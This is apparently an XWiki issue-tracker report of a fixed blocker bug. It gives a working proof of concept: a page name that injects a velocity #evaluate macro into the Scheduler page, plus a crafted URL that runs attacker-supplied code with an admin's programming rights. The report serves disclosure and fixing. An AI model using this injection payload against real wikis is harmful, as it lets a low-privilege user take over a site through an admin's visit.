Details
- Bug
- Resolution: Fixed
- Blocker
- 3.1
- Unit
- Unknown
- N/A
- N/A
- Pull Request accepted
Description
Steps to reproduce:
- As a user without script, admin or programming right but regular edit right, create a document with reference
">]]{{/html}}{{async context="request.parameters"}}{{velocity}}#evaluate($request.eval).WebHome
URL for easier creation: http://localhost:8080/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/
- Add an object of type XWiki.SchedulerJobClass
- Save
- Get an admin to visit http://localhost:8080/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22) - e.g., write a comment with an image with that URL.
Expected result:
The Scheduler page is normally displayed and no error is logged.
Actual result:
An error "ERROR attacker - Hello from URL Parameter! I got programming: true" is logged. The layout of the job scheduler page is broken: